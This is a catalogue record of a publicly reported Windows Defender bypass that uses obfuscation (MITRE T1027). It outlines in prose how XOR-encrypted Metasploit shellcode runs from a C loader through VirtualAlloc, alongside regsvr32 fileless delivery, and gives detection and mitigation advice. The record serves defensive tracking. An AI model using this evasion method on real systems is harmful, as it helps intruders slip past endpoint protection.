Obfuscation / Packing × Microsoft Windows Defender

A publicly-reported instance of Obfuscation / Packing bypassing Microsoft Windows Defender, recorded with its original source. Factual record; no assessment of any specific deployment.

Product

Microsoft Windows Defender

Technique

Obfuscation / Packing

MITRE ATT&CK

T1027

Confidence

High

Severity

High

Status

poc

Disclosed

2026-01-28

Config / version noted

Not stated

Provenance

bloo.io
disclosed 2026-01-28 · original source · via exa

Reported as

bypassed Defender's real-time protection and static scanning

Mechanism

Raw shellcode is exported from Metasploit, XOR-encrypted with a Python script, and embedded in a custom C loader. The loader decrypts the shellcode in memory, allocates executable memory via VirtualAlloc, and executes it, avoiding signature-based and static detection by Windows Defender. The Script Web Delivery module uses regsvr32.exe for fileless command execution.

Detection & mitigation

Monitor for processes allocating executable memory (e.g., VirtualAlloc with PAGE_EXECUTE_READWRITE) and then executing code from that region, especially when combined with suspicious child processes or network connections. Deploy endpoint detection rules that flag decryption routines followed by memory execution, and ensure antivirus signatures are updated to detect known Metasploit shellcode patterns even after XOR encoding.

Obfuscation / Packing has also been recorded against

Bitdefender Elastic ESET

This is a record of a publicly-reported event, not an assessment of any specific organization's deployment. Detection and mitigation notes are drawn from the cited source. Where the source is silent, fields are omitted.